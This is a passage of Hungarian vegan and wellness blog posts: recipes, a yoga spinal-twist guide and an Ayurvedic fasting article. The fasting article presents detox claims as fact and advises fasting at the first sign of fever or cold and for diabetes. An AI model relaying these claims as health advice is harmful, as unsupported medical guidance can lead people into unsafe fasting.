A szójagranulátumot megszórom 1 ek ételízesítővel és felöntöm forró vízzel, majd hagyom benne állni legalább addig, amíg a barna rizs puhára fő. Miután megfőtt a rizs, a vizet szűrőn keresztül leöntöm a szójagranulátumról majd a rizzsel összekeverem. Teszek hozzá annyi zabpelyhet amennyit felvesz. Használhatunk zabpelyhet, de meg is őrölhetjük amolyan zablisztté és úgy is adhatjuk hozzá. A lényeg, hogy olyan masszát kapjunk, amit könnyen tudunk formálni a kezünkkel. Hozzákeverjük a fűszereket, jól átdolgozzuk a masszát, hogy a fűszerek jól elkeverődjenek. Nedves kézzel kis darabokat szakítunk le belőle majd kolbász formákat sodrunk. Sütőpapíros tepsin előmelegített sütőben 20-30 perc alatt készre sütjük. Kirpóbáltam, air fryer (forró levegő sütő)-ben is megsüthető, kisebb mennyiségnél (pár darab) érdemes azzal, de többnél jobban megéri sütőben sütni.
Brokkolis karfiolleves (vegán)
Ősz végén, tél elején a brokkoli és a karfiol bevirágozhatja főztünket. Ez elég furcsán hangzik, de ha azt mondom, a brokkoli és a karfiol virágát fogyasztjuk leginkább, akkor már érthetőbb. Brokkolit különben már az ókori Róma konyháiban is főztek-fogyasztottak, derül ki Apicus szakácskönyvéből. Apicus az ie. 25-ben gazdag arisztokrata családban született í nyencségéről és tékozlásáról híres ember bejáratos volt a császári udvarba. Szakácskönyve, a De re conquinaria (A konyhaművészetről), Cato De agri cultura (A mezőgazdaságról) című könyveiben leírja az ókori rómaiak élet- és étkezési szokásait, s körülbelül ötszáz étel receptjét tartalmazza, többek közt a brokkoliról is említést tesz.
A brokkolihoz képest a karfiol a Közel-Keletről származik. Ugyan ezt is ismerték és szerették már a görögök és a rómaiak is, viszont hosszú ideig feledésbe merült, majd a XVI. században jelent meg újra a genovai tengerészeknek köszönhetően, akik keletről hozták - mint újdonságot.
Akármilyen utat is tettek meg, ma már a legtöbb nemzet konyhájában szerepel. Érdekes tény, hogy a brokkoli és karfiol virágait fogyasztjuk leginkább és mégis a kertekben igen jól bírják a hideget, szinte hűvösben nőnek a legjobban. Ezért is előnyös ilyenkor, ősszel brokkoliből és karfiolból ételt készíteni. Nem hiába ilyenkor jobban előfordulnak piacokon, boltokban, zöldségeseknél.
Készítsünk egy meleg levest ezekből a virágokból a hideg napokra! Melegedjünk fel a finom enyhén citromos, enyhén csipős ízzel citromot és chilit rakva a tányérunkba! (A chili paprikából érdemes konyha-ollóval belevagdosni a levesbe, kezdésként csak egy keveset.
A recept
Hozzávalók:
- 25 dkg brokkoli
- 25 dkg karfiol
- 25 dkg zöldborsó
- 3-4 szem krumpli
- 1 hagyma
- 3 dl növényi tej vagy tejszín
- 6-8 gerezd fokhagyma
- 1-2 ek ételízesítő
- tárkony
- petrezselyem
- 1 citrom (opcionális)
- chili paprika (opcionális)
Elkészítés:
A hagymát miután megpucoltuk jó apróra vágjuk vagy aprító gépben összeaprítjuk. A brokkolit és a karfiolt rózsáira szedjük, törzsének lágyabb részét felkarikázzuk majd az egészet megmossuk. A krumplikat meghámozzuk és nagyobb kockákra vágjuk. A hagymát kevés vizen üvegesre pároljuk, hozzáadjuk az elkészített brokkolit, karfiolt, krumplit majd a zöldborsót. Meghintjük házi ételízesítővel, adunk hozzá egy kevés őrölt tárkonyt és felöntjük annyi vízzel, ami éppen csak ellepi. Nagy lángon addig főzzük míg a zöldségek roppanósra nem főnek. Hozzáadjuk a megpucolt, esetleg feldarabolt (vagy ha egész gerezdeket szeretjük, úgy hagyjuk) fokhagymát és a növényi tejet. Addig főzzük míg ismét rottyan egyet, közben adunk hozzá apróra vágott petrezselyem zöldet.
Tálalásnál citromszeleteket és chilipaprikát is kínálhatunk hozzá.
Mákos banánguba
Nyers ételekkel táplálkozók bizonyára maguk is kreáltak már ilyen mákos gubát, de ha nem, jó ötletként szolgálhat nekik. Persze az emberiség kisebb csoportja táplálkozik nyersen, még többen vegánok, annál is többen vegetáriánusok, de ezt a finomságot húsevőknek is ajánlom, különösen, ha szeretik a mákot. Roppant egyszerű, laktató és nagyon finom. Bevallom nálam a reggelit szolgálta ez egy időben, egyszerűen csak ezt kívántam. Lehet a kalcium forrása miatt. Ugyanis 100 gram mák 1400 mg kalciumot tartalmaz. (Sokak által hamisan dicsőített tej ehhez képest csak 120 mg-ot). Persze míg nekem reggeli volt, másoknak inkább édesség lesz. Ha gyakran fogyasztjuk ezt a finomságot, könnyen pótolhatjuk a kálciumot a szervezetünkbe. Testünket jobban igénybe vett fizikai mozgás (kerti munka, sport - csak hogy kettőt említsek), betegségből való lábadozás időszakában különösen ajánlom ezt a mákos banángubát, hiszen a mák kálcium tartalma mellett a banánnak k iemelkedően magas a kálium tartalma (350-400mg/100g), mely, a benne lévő magnéziummal és kevés kalciummal együtt a magas vérnyomás kezelésében játszik szerepet, a banán magnézium tartalma pedig csökkenti az izom görcsöket és segíti a szívizom karbantartását. Gluténmentes, vegán, nyers, egészséges és finom. Kell ennél több? :)
A recept
Hozzávalók:
2 banán
1-2 evőkanál mák
Elkészítés:
A mákot megdaráljuk, a banánokat felkarikázzuk. Egy tálba beletesszük a felkarikázott banánt és meghintjük a darált mákkal. Összeforgatjuk, hogy minden karikára gazdagon jusson a mákból.
Kis tálkákban tálaljuk. Nem kell hozzá semmi édesítő, se cukor, se méz, se más, hiszen a banán eleve nagyon édes.
Sült alma dióval
Először is be kell vallanom, hogy ez a fionmság sokkal gyorsabban elkészül air fryerben, forró levegő sütőben. De ha neked nincs, az se tartson vissza, mert sütőben is elkészíthető, csak valamivel lassabban, hiszen a sütő felmelegítése és melegen tartása lassabban megy végbe. Finom kis őszi édesség, ha már ilyenkor talán könnyebben lehet almához jutni. Bár tudom, Magyarországon igazán borsos ára tud lenni, persze Angliában is attól függően, hogy hol és hogyan veszi meg az ember. Valamikor az ősz során szeretem a piacos zöldségestől kartondobozba venni, így az sokáig elég, és általában olcsóbban is adja.
Ezt az édességet azonban őszintén szólva tavasszal készítettem, finom golden almákból. Ha savanykás almád van, vagy édes, mindkettő esetben ajánlom elkészíteni.
A recept
Hozzávalók:
- néhány szem alma
- 1 kis marék dió
- mazsola/datolya
- reszelt citrom héj
Elkészítés:
A megmosott almákat vagy félbe vágjuk, vagy vastagabbb körökben felszeleteljük. Sütőpapíros tepsibe fektetjük őket és sütőben addig sütjük, míg aranybarnára nem sülnek. Nem kell megijedni, fehér levet fog ereszteni valószínű, ami megkaramellizálódik a tetején.
Air fryerben készítve pedig a készülék kosarába tesszük, 150-160 C fokon kb 5-8 perc alatt (vastagságtól függ) megsütjük.
Amíg sülnek diót darálunk, datolyát, mazsolát aprítunk (állaguktól függően lehet egy kis meleg vizes áztatás jót tesz nekik). Reszelt citrom héjat adunk hozzá. Az egészet összekeverjük és a megsült almák közepébe golyókat formálunk belőlük.
Melegebben tálalva finomabb, de az se baj, ha kihűlt.
Tégy a gerinced egészségéért! - Vakrászana (Gerinccsavarás 1.)
2020. október 13. Élj harmóniában
A Vakrászana (Gerinccsvarás 1.) egy ülő helyzetből végzett gerinccsavaró gyakorlat. A Vakrászana harmonizálja az egész szervezet működését. Átmasszírozza a belső szerveket (máj, gyomor, lép, hasnyálmirigy) és kiváló emésztési problémáknál, székrekedésnél is. Rugalmasan tartja a tested és erősíti a gerinc menti izmokat. Nyújtja az ülőmunka miatt befeszült területeket - háti, deréktáji, nyaki területet, a csípő körüli izmokat és az oldalsó törzsizmokat is. Segít a gerinc egészségének megőrzésében, az ülőmunka okozta problémák kompenzálásában. Mint minden csavaró és előrehajító gyakorlat jó a hasi zsírpárnák ledolgozására is. Az egész testet energetizálja azáltal, hogy a gerinc menti területet felfrissítni. Hogyan végezd el? - Ülj le a talajra kinyújtott lábakkal. Kiindulási póz a Dandászana (amiről egy korábbi bejegyzésben már írtam). - Állítsd talpra a jobb lábad és tedd át a talpad a kinyújtott bal lábad külső oldalára, a térddel egy vonalba. - Egy belégzéssel emeled a jobb kezed a magasba nyújtozz egyet az ülőcsontból kiindulva. - Kilégézssel csavarodj el hátra és tedd a jobb kezed a gerinced vonalába - figyelj, hogy a gerinced egyenes maradjon. - Belégzéssel emeld a bal kezed a magasba, nyújtoztasd meg a bal oldalad is, majd fogd át a jobb lábad. - Kilégzéssel próbálj még jobban csavarodni. - A bal lábad nyújtsd aktívan, nyújtózz a sarkaddal és pipálj a lábaddal, feszítsd vissza a külső talpéled. Úgy dolgozz vele, mint Dandászanában és Tadászanaban (Hegytartásban) Húzd fel a térdkalácsot, a combizmok segítségével és nyújtózz a sarkaddal, a kis lábujj, külső talpélet próbáld visszafeszíteni. A térdhajlatot, comb hátsó felét közelítsd a talaj irányába. Ha erőtlen a láb, nem tartod aktívan, akkor a törzsed is erőtlen lesz az ászanában. Folyamatosan próbálj a medencédből a fejtetővel és a törzs mindkét oldalával nyújtózni, tarts meg a gerinced. tartsd a hasat, köldököt. Belégzéssel nyújtózz a szegycsonttal és fejtetővel fölfelé, nyisd a mellkast. Kilégzéssel nehezítsd a medencéd a talaj irányába és próbáld mélyíteni a pózt csavarodj még jobban hátrafelé. Folyamatosan legyen meg az ászana kivitelezése közben a nyújtózás érzése a testedben. A lapockákat húzd össze és nyisd a mellkast, ne engedd, hogy a fülek és a vállak közel kerüljenek egymáshoz. Figyelj, hogy az ászana közben a fejed ne lógjon, hanem legyen megtartott és aktívan nyújtózz a fejtetővel. A kinyújtott lábad sarkát nyújtsd el magadtól hosszasan és a behajlított lábadat told a talaj fel. Az ászana kivitelezése kzben nyisd ki a szemed és ha a talajt látod vagy a plafont, akkor biztos, hoyg elmozdítottad a fejed, hozd visszaközéphelyzetbe. Próbáld legalább 20-30 másodpercig megtartani a pózt. Kijövetel a pózból: Belégzéssel emled a bal kart és csavarodj vissza, majd emeld el a jobb kezedet is. Amikor visszaérkeztél végezd el a gyakorlatot a másik oldalra is. Amikor leteszed a kezed hátul leteheted a tenyered, de ha nem ér le az ujjbegyeket és teheted a talajra. Ha valamin ülsz pl. jogablokkon és nem ér le a kezed a talajig, akkor a kezed alá is tegyél alátámasztásnak valamit, pl jógablokkot, jógatéglát vagy csak mnéhány könyvet:) Fontos, hogy először ezt a gyakorlatot mindig a jobb lábra végezd el a vastagbél iránya miatt. Ne végezd a gyakorlatot ha gerincsérved van. Kerüld ezt a gyakorlatot hasi sérvek és fekélyek esetén is, valamint akkor is ha erős hasmenésed van. A jógagyakorlatokat először mindig hozzáértő jógaoktatóval sajátítsd el. J ó gyakorlást kívánok:) szeretettel: Kati
Kakaós-meggyes tekercs
2020. szeptember 15. Mindennapi ételeink
A gyerekek szerettek volna sütni valamit, és amúgy is kell reggelit vinni az iskolába (ebéd előtt már hazajön Fannus, nem napközis), általában teszek be sósat, édeset is, a gyümölcsöt pedig indulás előtt itthon eszi meg Fanni. Így buktát és kakaós tekercset készítettünk.Hozzávalók:1/2 kg liszt (keverjük teljes őrlésű liszttel, én most kb 30-70 százalékban raktam bele)1 dl napraforgó olaj 2,5 dkg élesztő kb 10 dkg barnacukor 2 dl víz --szilvalekvárolaj, kakaópor, vaníliás cukor, magozott meggyszemek vaníliás szójatej Elkészítés:A lisztet összekeverjük a cukorral, olajjal, eközben felfuttatjuk -egy ek. cukrot téve a vízbe - az élesztőt, és tésztát dagasztunk. Kb 1 órát kelesztjük. Majd lisztezett deszkán nagyon vékonyra kinyújtjuk. A buktához téglalapokat vágunk, melyekre szilvalekvárt teszünk és buktává csavarjuk :-D, a kakaós tekercshez pedig kb 5 cm széles, hosszanti csíkokat vágunk, melyeket megkenünk olajjal és megszórunk előzőleg vaníliás cukorral kikevert holland kakaóporral. Ráhelyezünk tetszés szerinti meggyszemet. majd feltekerjük a tekercseket, és keresztben félbevágjuk. Olajozott, lisztezett tepsibe tesszük és meglocsoljuk kb 2 dl vaníliás szójatejjel. 180 fokon 20-25 percig sütjük.
Mogyoró vajas kókuszgolyó
2020. augusztus 19. Fittanyuka
Favorizálom a gyorsan és egyszerűen elkészíthető finomságokat,ami minél kevesebb időmbe telik és mégis finom, egészséges. Ezeket a golyókat eredetileg magamnak gyártottam, olyan alkalmakra amikor megéhezek, vagy edzés előtt vagyok és bekapok belőlük egy-kettőt, hogy energiát adjon. A gyerekek gyorsan felfedezték a hűtőben, nem kellett sokáig tárolnom őket, felfalták egy délután alatt. A tudat viszont nyugtatott, hogy a rendkívül édesszájú kisfiam semmilyen plusz cukormennyiséget nem vitt be a szervezetébe, ugyanis ez a recept csakis természetes cukrokat tartalmaz és abból is nagyon keveset. Hozzávalók: 1 db érett banán szétnyomva 2-3 evőkanálnyi 100%os mogyoró vaj 1 nagyobb bögre finom szemű zabpehely 1-2 dl rizstej kókuszreszelék a hempergéshez A zabpelyhet összekeverjük a többi összetevőkkel, amennyiben lágy zabpehellyel, amennyiben nagyon száraz még rizstejjel dúsítjuk. Körülbelül egy órára a hűtőbe tesszük,majd nedves kézzel golyókat formázunk és kókuszreszelékben meghempergetjük. Én néhányat cukormentes kakaóporban is meghempergettem, de akár kókuszvirág cukorral is megtehetjük. Zárható dobozban hűtőben tároljuk.
Mákos guba szilvalekvárral
A legtöbb ember vanília sodóval tálalja és fogyasztja a mákos gubát, pedig a szilvalekvár és a mák együtt is jól harmonizál. Angliában nem lehet kiflit kapni. Nem láttam még lengyel boltokban sem, ahol azért meg-megfordul magyar termék, mint túrórudi és társai. Persze, lehet hogy van valami magán (magyar) pék, aki süt, de nem jellemző. Olyannyira, hogy valaki jött hozzánk és megkérdezte, mit kérünk, férjemmel egyszerre mondtuk, kiflit. :) Pedig én is sütöttem már ropogós kiflit teljes kiőrlésű lisztből. Nem is arról van szó, hogy ne tudnék sütni.
No de ahogy említettem, itt nincs kifli, viszont rátaláltam a helyi lidlben egy vegán jelzésű bagel csomagra, ami adta az ötletet. Ha a bagelt felkarikázom, akkor tulajdonképpen olyan, mint a kifli-karika. Így kezdődött a gubázás. :)
Nyáron persze ritkábban készít az ember mákos gubát, na de ha az időjárás viharossá válik, amikor az ember csak begubózna, akkor igazán jól jön egy kis gubás finomság.
A recept
Hozzávalók:
- 6-8 kifli (vagy bagel) felkarikázva, megszárítva
- 1 liter növényi tej (zabtejet használtam most)
- 5-6 ek mák
- 3 ek erythritol
- szilvalekvár
Elkészítés:
A mákot megdaráljuk (ha elektromos darálóval daráljuk, akkor érdemes hozzáadni egy kis erthritolt, ha kézi darálóval, akkor csak a darálás után).
A bagel vagy kiflikarikákat felforralt, kissé megédesített tejben enyhén megáztatjuk, majd egy tálba tesszük. Rászórunk gazdagon a mákból, maj újabb sor megáztatott karikákat teszünk le. Szintén gazdagon megszórjuk az édes darált mákkal. Ezt addig folytatjuk, míg a kiflikarikák elfogynak. Vannak, akik szeretik kisütni, ez nem feltétlenül szükséges. Tálalásnál szilvalekvárot kanalazunk a tetejére.
Nyers vegan brownie
2020. május 13. Mindennapi ételeink
Lassan itt az eperszezon, így ideje elpusztítani a hűtőben megmaradt fagyasztott, finom eperszemeket. Most vegán nyers brownie készült hozzá. Hozzávalók: 1 bögre mandulaliszt 2 púpos ek.kakaópor 20 szem datolya 4-5 ek. juharszirup vagy alternatív édesítőszer -- 1 csomag xilites vaníliapudingpor 1/2 l növényi tej Elkészítés: A datolyát egy éjszakára beáztatjuk. Majd az áztatólével (kb 0,5 dl) együtt turmixgépbe tesszük, és simára turmixoljuk. Hozzáadjuk a mandulalisztet, a kakaóport, és az édesítőt. Hűtőformába tesszük és 2 órára hűtőbe tesszük. Eközben elkészítjük az ebédet, játszunk egy nagyot a gyerekekkel és a pudingot is elkészítjük. Ráöntjük a felszeletelt süteményre, és eperrel díszítjük.
Őszibarackos gombóc vaníliaöntettel
2020. május 6. Mindennapi ételeink
Hozzávalók: 8 szem burgonya kb 200-300 dkg liszt 2 ek. olaj kevés só -- fahéj, eritrit (barnacukor, stevia stb.), barack/szilva/meggy/eper 8 ek. zsemlemorzsa -- 1 vaníliapuding 1/2 l növényi tej vaníliás cukor (én xiliteset használok) Elkészítés: A burgonyát meghámozzuk, felkockázzuk és megfőzzük. Amikor teljesen kihűlt, összetörjük, hozzáadjuk az olajat és a lisztet, ez utóbbiból annyit, hogy lágy, de nem ragadós tésztát kapjunk. Lisztezett deszkán kinyújtjuk, felkockázzuk és az előre beédesített, fahéjjal megszólt barackdarabokat beletesszük, összegombócozzuk és forrásban lévő vízbe téve kifőzzük. Amikor feljön a felszínre, utána kb 5 perc múlva lesz jó. Az öntethez vaníliapudingot készítünk . Frissen tálaljuk.
Sós-Tökmagos “Túrós” kalács
A húsvéti édes, vegán, tönköly kalács után nagyon belejöttem a kelt tészta sütésbe. Habár eredetileg ez a recept nem kalácsnak indult, még énsem gondoltam, hogy a recept készítés közben meggondolom magam. “Túrós”, vegán pogácsának indítottam, meggondoltam magam, mert a gyerekek azt kérdezték, hogy most sütöm a második kalácsot, amit sósnak igértem?! A folyamat elején voltam , így “apró” kis változtatással, megváltoztattam az eredeti tervem. A végeredmény pedig engem is meglepett, mert nagyon puha, lyukacsos tészta lett az eredmény, ráadásul a tészta sokáig így is marad, napokig nem száradt ki. Jöhet a recept: Hozzávalók: - 50 dkg világos tönköly liszt (Készíthetjük felesben: 25 dkg világos és 25 dkg teljeskiörlésű tönkölylisztből is) - 35 dkg vegán margarin - 50 dkg selyem tofu, én ezt használtam túró helyett, mivel tejterméket egyáltalán nem fogyasztok, a megreformált recept 50 dkg tehéntúrót ír, ha valaki azzal szeretné készíteni esetleg. - 30 g friss élesztő - (1 dl rizstej, 1 teáakanál barna cukor az élesztő felébresztéséhez) - 20 g só - maréknyi tökmag a tetejére Három, vagy négy csapott evőkanál lisztet elkeverünk a barna cukorral, a langyos rizstejet pedig szintén elkeverjük az élesztővel, utána hozzáadjuk a liszthez, és meleg helyen letakarva felfuttatjuk. A lisztet, sót, selyem tofu, vegán margarint egy keverőtálba összegyúrjuk, majd hozzáadjuk és alaposan átgyúrjuk a felfutatott élesztővel. Átdolgozzuk és itt még az a pont amikor akár pogácsa is lehet belőle. Pogácsa esetében vékonyra nyjtjuk a tésztát és 2x hajtogatjuk, újra kinyútjuk, majd kisszagattjuk és utána kelesztjük sütés előtt kb. 20 percig. Kalács esetében viszont letakarva kelesztjük szintén meleg helyen 15- 20 percig. Utána három egyenlő részre osztjuk, megsodorjuk a fonni kivánt tésztákat és összefonjuk, egy kikent formába tesszük és letakarva újabb 15-20 percig kelesztjük. Tetejét kókusztejszínnel kentem le és tökmaggal megszórtam. Tipp: Amennyiben nincs meleg hely a konyhánkban, állítsuk be a sütőt 50 C fokra, nyissuk ki a sütő ajtót és tegyük oda a tésztánkat kelni! Előmelegített, légkeveréses sütőben 180 C fokon 35 percig sütjük. Mielőtt kivennénk végezzünk tűpróbát, hogy meggyőzödjünk, hogy kellően átsült-e?!
Böjt - tehermentesítés, méregtelenítés, gyógyulás
2020. március 29. Élj harmóniában
A böjt az emésztőrendszer és a szervezet tehermentesítésére szolgál. A böjt ideje alatt nem fogyasztunk szilárd ételt. Az ételektől való tartózkodás növeli a testben lévő könnyűséget, segít a szervezet megtisztításában. Azáltal, hogy az emésztőrendszer pihen, erősödik az emésztés tüze (,,agni) és mivel nincs étel amit megemésszen, így a belekben felhalmozódott mérgeket égeti el. Amikor valaki beteg lesz, hasznos, ha böjtöt tart, így a szervezet tisztul és teljes erőbedobással a gyógyulásra tud koncentrálni és nem az emésztéssel lesz elfoglalva. Kifejezetten jótékony a böjt láz, megfázás, székrekedés, ízületi fájdalom, gyulladások esetén, illetve amikor salakanyagok vannak a vastagbélbe (,,ama). Egészséges embereknek jótékony heti 1 nap , forralt vizes böjtöt tartani. Ez pihenteti az emésztőrendszert és segít az egészség fenntartásába. A forralt vizes böjtről itt olvashatsz részletesen. Az ájurvéda néhány gyógynövényt kifejezetten gyógyszerként használ a böjt alatt. Ilyenek a gyömbér, fekete bors, cayanne bors, curry - mindegyik segít a mérgeket semlegesíteni. Érdemes belőlük teát készíteni, melegen fogyasztani. A böjtölés előtt nagyon fontos az egyéni alkat figyelembevétele. Az ájurvédikus alkatok szempontjából vata alkatúaknak legfeljebb 3 nap böjt ajánlott, mert a böjt növeli a könnyűséget a testben kibillenti a vata-t az egyensúlyából és idegességet, aggodalmakat, félelmet és gyöngeséget okoz. A pitta alkatúaknak szintén 3 legfeljebb 4 napos böjt javasolt. A 4 napon túl terjedő böjt irritálja a pittát, megnöveli a testben lévő tűz elemet és hatására düh, gyűlölet, szédülés jelenhet meg. Kapha alkatúak hosszan tartó böjtöket is tarthatnak, számukra kifejezetten kedvező - értelmük, tisztánlátásuk javul, könnyeddé válik a testük. Ha valaki léböjtöt tart, érdemes figyelembe venni, hogy a vata- nak szőlőlé, pitta-nak gránátalmalé, kapha-nak almalé tesz jót. Az ájurvéda orvosi ajánlása alapján a böjttel fel kell hagyni, amikor csökken a fizikai erő és állóképesség. A jól kivitelezett böjt méregteleníti a szervezetet, kiegyensúlyozottá, fitté, könnyűvé teszi a testet, szépíti a bőrt, javítja az emésztést, csökkenti vagy megszünteti a gyulladásokat, ízületi problémákat, fejfájást, allergiás tüneteket. A böjt jótékony a cukorbetegség és a magas vérnyomás esetén is és erősíti az immunrendszert. Kedvező ha tartasz minden héten vagy minden hónapban 1 böjtnapot (forralt vízzel). Amennyiben láz vagy megfázásos betegség tüneteit tapasztalod, legjobb ha azonnal kezdesz böjtölni. Jó egészséget kívánok:) szeretettel Kati
Protein ball
2020. március 24. Beautilicious
Otthoni edzés pipa és megjutalmaznád magad valami ártalmatlan édességgél, ami amellett, hogy nagyon finom, rendkívül jó makrokkal rendelkezik? Elhoztam nektek a legújabb kedvencemet, amivel mostanában nem birok belelni :) Hozzávalók - 100g túró - 1 adag fehérje - 25g kókuszreszelék - pici tej - Ízlés szerint lehet hozzá gyúrni apróra vágott gyümölcsöt, csokit, aszalványokat, kinek mi fér bele A hozzávalókkal nincs más dolgod, mint ezekből golyókat formázni, és betenni a hűtőbe picit pihentetni, hogy összeálljon.
protein madártej
2020. január 27. Beautilicious
Hát én azt mondom édességből sose elég.Pláne nem az edzés után megérdemelt proteines desszertekből. Madártejet készítettem mindössze 2 tojásból 30gr vaníliás fehérjeporból, kókusztejből és édesítőszerből. A hagyományos madártejhez hasonlóan készítettem el annyi különbséggel, hogy pudingpor helyett fehérjeport használtam bele. Kicsit extráztam a dolgot bogyós gyümikkel és kókuszreszelékkel. És volálá :
Narancsos édesburgonya krémleves (laktózmentes, gluténmentes, vegán)
2019. december 19. Zizi kalandjai
Édesburgonyából még sosem készítettem levest. Nem tudom miért vártam eddig. Ezt a levest az idei legutolsó főzőkurzusomon (karácsonyi) főztük meg és lenyűgözött, de a résztvevőket is. Néhány, a sarki zöldségesnél is beszerezhető alapanyag kell hozzá és fél órán belül már az asztalunkon gőzölög a finom leves. Karácsonykor nálunk biztosan az asztalra kerül… javaslom, hogy nálatok is. Source
Mákos puliszka-tekercs
Gluténmentes, vegán édesség amelyet könnyű elkészíteni és akár a karácsonyi asztalon is megállja a helyét. Azonban karácsony nélkül is elkészíthetjük. Azért is ajánlott elkészíteni mert mák-tartalmának köszönhetően kalciumban és vasban gazdag édesség, ami szolgálja és építi csontjainkat, segíti szervezetünk egészséges működését.
A recept
Hozzávalók:
- 15 dkg kukoricadara
- 5 dl növényi tej (vízzel is elkészíthető)
- 1.5 dkg gyümölcs cukor vagy eritritol
- pár csepp vanília kivonat (elhagyható)
- 12 dkg mák
- 3 dkg gyümölcs cukor
- 1 citrom héja
Elkészítés:
A növényi tejet felforraljuk és folyamatos kevergetés mellett beleszórjuk a kukoricadarát és a gyümölcs cukrot vagy eritritolt és a vaníliát, majd folyamatosan keverjük, amíg be nem sűrűsödik. Keményebb állagúnak kell lennie, amit már nehéz kavarni. Félretesszük hűlni, míg elkészítjük a tölteléket.
A mákot megdaráljuk, hozzákeverjük a gyümölcs cukrot és a (lehetőleg bio) citrom lereszelt héját.
Frissentartó fóliát simitunk az asztalra vagy a munkalapra, amin összeállítjuk a sütit. A valamelyest kihűlt keményre sűrűsödött puliszkát a fóliára kanalazzuk, majd megpróbáljuk eloszlatni. Amikor nagyjából egyenletesen eloszlattuk, egy másik fóliát teszünk a tetejére, azon keresztül tudjuk használni a sodrófát és szép, téglalap alakúra nyújtjuk a puliszkát. Amikor kinyújtottuk, lehúzzuk a felső fóliát és megszórjuk a tetejét mákkal. Ahogy rétest vagy piskótát tekerünk fel, úgy tudjuk feltekerni ezt is, tehát az alul lévő frissentartó fólia segítségével. Amikor tekercsbe csavartuk, a frissentartó fóliát körétekerjük és így hűtőben állni hagyjuk, dermedni egy éjszakát vagy legalább pár órát.
Tálalás előtt szeleteljük.
Fahéjas mandula
A legtöbb városban megkezdődtek már a karácsonyi vásárok, amelyek színes fényei és finom illatai vonzzák az emberek nagy részét. Sokan kimennek nézelődni, talán nem is vesznek semmit, csak szeretik, ahogy elragadja őket a tömeg és a látnivalók ünnepi hatása. Mások külön vásárlási céllal mennek, vagy hogy legalább egy jót egyenek és igyanak a hidegben. Vannak, akiket a finom fahéjas illatfelhők vonzanak, ami a fahéjas manduláknak köszönhetően nem csak a levegőt fűszerezi meg, hanem a vásárlást és a karácsonyi hangulatot is édesebbé teszi.
Mi magunk is elkészíthetjük a fahéjas mandulákat és általa beillatozhatjuk a lakást, megédesíthetjük szeretteink napját. Gasztro-ajándéknak is kiváló lehet karácsonyra (előtte azért érdemes kideríteni, hogy nem mogyoróérzékeny-e az illető), és mindössze fél óra alatt kész.
A recept
Hozzávalók:
- 20 dkg mandula (nem blansirozott)
- 4 dkg gyümölcscukor
- 4 dkg xylit vagy eritrit
- 2+1 ek növényi tej
- 1 púpos teáskanál őrölt fahéj
- vanília aroma vagy kivonat
Sütés utáni forgatáshoz:
- 2-3 ek fahéjas gyümölcscukor
- 1 ek karobpor (elhagyható)
A mandulát egy teflon serpenyőben vagy palacsintasütőben megpirítjuk. Amig pirulnak, addig összekeverjük a fahéjat, gyümölcscukrot, xylitet vagy eritritet, a 2 ek növényi tejet és a vaníliát. Ezt a sűrű édes szirupot a megpirult mandulára öntjük és kis lángon, folyamatosan, türelmesen kevergetjük. Ha a kis keverőtálból nem jön ki az összes szirup, 1 ek növényi tejjel kiöblítjük, amit szintén a serpenyőbe öntünk. Mikor a mandula és a fahéjas cukros szirup elkezd sűrűsödni, (ezt abból látjuk, hogy nagy buborékok keletkeznek, az edényben pedig vékony szálak nyúlnak el) akkor levesszük a tűzhelyről. Hagyjuk egy kicsit kihűlni a mandulát.
Egy sütőpapírra fahéjjal elkevert gyümölcs-cukrot szórunk és a még viszonylag meleg mandulákat kisebb szűrőkanál segítségével kiszedjük az edényből és beleforgatjuk a fahéjas cukros porba. Egyszerre ne sok mandulát forgassunk. Kb 4-6 szemet. A papírt mozgatva könnyebben tudjuk gurítani a mandulákat a fahéjban.
A kész mandulákat egy tálba tesszük vagy szép kis zacskóba (lehet papír vagy celofán) csomagoljuk, attól függően, hogy ajándéknak adjuk, vagy a családot, vendégeket örvendeztetjük meg velük.
Vegasztrománia Karácsony: Töltött kelkáposzta fűszeres paradicsommártásban
2019. október 31. Vegasztrománia
Évek óta tervezem, hogy a Karácsony előtti időszakot valódi készülődéssel és ráhangolódással töltöm, de az utóbbi pár évben általában december közepe után eszméltem fel, hogy ebből nem sok valósult meg. Idén viszont végre máshogy alakult. Múlt pénteken letettem egy hatalmas őszi csomagot, és ez segített abban, hogy az őszi szünet lendületével el tudjam kezdeni a vágyott megélést. A saját, belső készülődésig, vagyis Adventig van még időm, de a receptek megfőzését, megosztását most kezdem, hogy a munka és tanulás mellett minél többet meg tudjak osztani az ötleteimből. Közben az idő is lehűlt, ez a töltött kelkáposzta pedig olyan karácsonyillatot terített szét a lakásban, hogy ezek után remélem, nem lesz gond a hangolódással. Töltött kelkáposzta fűszeres paradicsommártásban Hozzávalók: (10 tekercshez) 10 kelkáposzta levél megmosva 2 ek növényi olaj 1 hagyma felkockázva 3 fokhagyma apróra vágva 2 szár angol zeller apróra vágva 1 sárgarépa lereszelve (vagy késes aprítóban felaprítva) 1 fehérrépa lereszelve (vagy kése aprítóban felaprítva) 150 g gomba kis kockákra vágva 1/2 birsalma lereszelve 1 tk füstölt paprika 100 ml rozé bor 150 g főtt rizs 50 g gesztenye kis kockákra vágva 50 g aszalt szilva 50 g dió ledarálva 1 csokor petrezselyem felaprítva 1 narancs héja lereszelve 2 x 400 g hámozott paradicsom konzerv pürésítve 100 g paradicsom passata 4-5 szem szecsuáni bors 1/2 tk creol fűszerkeverék, vagy ugyanennyi Cayenne-bors 1/2 tk fahéj, vagy 1 fahéj rúd 1/2 tk reszelt szerecsendió 2 cm-es gyömbér lereszelve 3-4 szegfűszeg só frissen őrölt bors Hevítsük fel az olajat egy nagy serpenyőben, majd adjuk hozzá a hagymát, a fokhagymát, a zellerszárat és pirítsuk 10 percig. Adjuk hozzá a sárgarépát és a fehérrépát, a füstölt paprikát, keverjük meg, öntsük hozzá a rozét és adjuk hozzá a birsalmát. Sózzuk, borsozzuk. 5 perc főzés után adjuk hozzá a gombát és pirítsuk további 5 percig. Hagyjuk egy kicsit kihűlni. Egy nagy keverőtálban keverjük össze a gombás keveréket, a rizst, a gesztenyét, a diót, az aszalt szilvát, a petrezselymet és a narancshéjat. Melegítsük elő a sütőt 180 °C-ra. Tegyük fel főni a paradicsommártást. Öntsük egy lábosba a paradicsomokat, és a fűszereket, és fedő alatt főzzük 20 percig. Forraljunk fel egy nagy lábos vizet, sózzuk meg, majd ebben főzzük 3-4 percig a kelleveleket. Hagyjuk őket szűrőn lecsepegni, és itassuk le róluk a felesleges vizet. Terítsük magunk elé egy levelet, tegyünk az alsó harmadára kb 3 ek tölteléket, hajtsuk be két oldalán, és tekerjük fel. Madzaggal át is köthetjük őket, megerősítés és esztétikai csavar végett, 